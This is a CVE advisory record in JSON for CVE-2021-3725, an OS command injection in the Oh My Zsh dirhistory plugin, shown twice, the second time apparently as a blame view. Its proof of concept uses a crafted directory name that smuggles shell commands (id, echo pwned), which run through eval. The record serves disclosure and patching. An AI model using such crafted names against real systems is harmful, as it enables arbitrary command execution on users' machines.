cvelist/2021/3xxx/CVE-2021-3725.json

{
    "CVE_data_meta":{
       "ASSIGNER":"security@huntr.dev",
       "ID":"CVE-2021-3725",
       "STATE":"PUBLIC",
       "TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"
    },
    "affects":{
       "vendor":{
          "vendor_data":[
             {
                "product":{
                   "product_data":[
                      {
                         "product_name":"ohmyzsh/ohmyzsh",
                         "version":{
                            "version_data":[
                               {
                                  "version_affected":"<",
                                  "version_value":"06fc5fb"
                               }
                            ]
                         }
                      }
                   ]
                },
                "vendor_name":"ohmyzsh"
             }
          ]
       }
    },
    "data_format":"MITRE",
    "data_type":"CVE",
    "data_version":"4.0",
    "description": {
         "description_data": [
             {
                 "lang": "eng",
                 "value": "Vulnerability in dirhistory plugin\n\nDescription: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection.\n\nImpacted areas:\n\n- Functions pop_past and pop_future in dirhistory plugin."
             }
         ]
    },
    "exploit": [
         {
             "lang": "eng",
             "value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n   baddir=\"directory';id;echo 'pwned\"\n   mkdir \"$baddir\" && cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n   $ <Alt-Left>\n   uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n   pwned"
         }
    ],
    "impact":{
       "cvss":{
          "attackComplexity":"HIGH",
          "attackVector":"NETWORK",
          "availabilityImpact":"HIGH",
          "baseScore":7.5,
          "baseSeverity":"MEDIUM",
          "confidentialityImpact":"HIGH",
          "integrityImpact":"HIGH",
          "privilegesRequired":"NONE",
          "scope":"UNCHANGED",
          "userInteraction":"REQUIRED",
          "vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",
          "version":"3.1"
       }
    },
    "problemtype":{
       "problemtype_data":[
          {
             "description":[
                {
                   "lang":"eng",
                   "value":"CWE-78 OS Command Injection"
                }
             ]
          }
       ]
    },
    "references":{
       "reference_data":[
          {
             "name":"https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb",
             "refsource":"MISC",
             "url":"https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"
          }
       ]
    }
 }
"-Synchronized-Data." 2021-08-19 18:00:51 +00:00			`{`
Update CVE-2021-3725.json 2021-11-30 09:23:31 +00:00			`"CVE_data_meta":{`
			`"ASSIGNER":"security@huntr.dev",`
			`"ID":"CVE-2021-3725",`
			`"STATE":"PUBLIC",`
			`"TITLE":"OS Command Injection in ohmyzsh/ohmyzsh"`
"-Synchronized-Data." 2021-08-19 18:00:51 +00:00			`},`
Update CVE-2021-3725.json 2021-11-30 09:23:31 +00:00			`"affects":{`
			`"vendor":{`
			`"vendor_data":[`
			`{`
			`"product":{`
			`"product_data":[`
			`{`
			`"product_name":"ohmyzsh/ohmyzsh",`
			`"version":{`
			`"version_data":[`
			`{`
			`"version_affected":"<",`
			`"version_value":"06fc5fb"`
			`}`
			`]`
			`}`
			`}`
			`]`
			`},`
			`"vendor_name":"ohmyzsh"`
			`}`
			`]`
			`}`
			`},`
			`"data_format":"MITRE",`
			`"data_type":"CVE",`
			`"data_version":"4.0",`
"-Synchronized-Data." 2021-08-19 18:00:51 +00:00			`"description": {`
Update CVE-2021-3725.json 2021-11-30 09:23:31 +00:00			`"description_data": [`
			`{`
			`"lang": "eng",`
			`"value": "Vulnerability in dirhistory plugin\n\nDescription: the widgets that go back and forward in the directory history, triggered by pressing Alt-Left and Alt-Right, use functions that unsafely execute eval on directory names. If you cd into a directory with a carefully-crafted name, then press Alt-Left, the system is subject to command injection.\n\nImpacted areas:\n\n- Functions pop_past and pop_future in dirhistory plugin."`
			`}`
			`]`
			`},`
			`"exploit": [`
			`{`
			`"lang": "eng",`
			`"value": "Exploit PoC:\n\n1. Install Oh My Zsh.\n2. Enable the dirhistory plugin.\n3. Open a terminal and create and cd into a directory like so:\n\n baddir=\"directory';id;echo 'pwned\"\n mkdir \"$baddir\" && cd \"$baddir\"\n\n4. Press Alt-Left to go back to previous directory (in macOS, use Option-Left).\n\n5. id and echo pwned are executed:\n\n $ <Alt-Left>\n uid=1000(user) gid=1000(user) groups=1000(user),4(adm),24(cdrom),27(sudo),...\n pwned"`
			`}`
			`],`
			`"impact":{`
			`"cvss":{`
			`"attackComplexity":"HIGH",`
			`"attackVector":"NETWORK",`
			`"availabilityImpact":"HIGH",`
			`"baseScore":7.5,`
			`"baseSeverity":"MEDIUM",`
			`"confidentialityImpact":"HIGH",`
			`"integrityImpact":"HIGH",`
			`"privilegesRequired":"NONE",`
			`"scope":"UNCHANGED",`
			`"userInteraction":"REQUIRED",`
			`"vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H",`
			`"version":"3.1"`
			`}`
			`},`
			`"problemtype":{`
			`"problemtype_data":[`
			`{`
			`"description":[`
			`{`
			`"lang":"eng",`
			`"value":"CWE-78 OS Command Injection"`
			`}`
			`]`
			`}`
			`]`
			`},`
			`"references":{`
			`"reference_data":[`
			`{`
			`"name":"https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb",`
			`"refsource":"MISC",`
			`"url":"https://github.com/ohmyzsh/ohmyzsh/commit/06fc5fb"`
			`}`
			`]`
"-Synchronized-Data." 2021-08-19 18:00:51 +00:00			`}`
Update CVE-2021-3725.json 2021-11-30 09:23:31 +00:00			`}`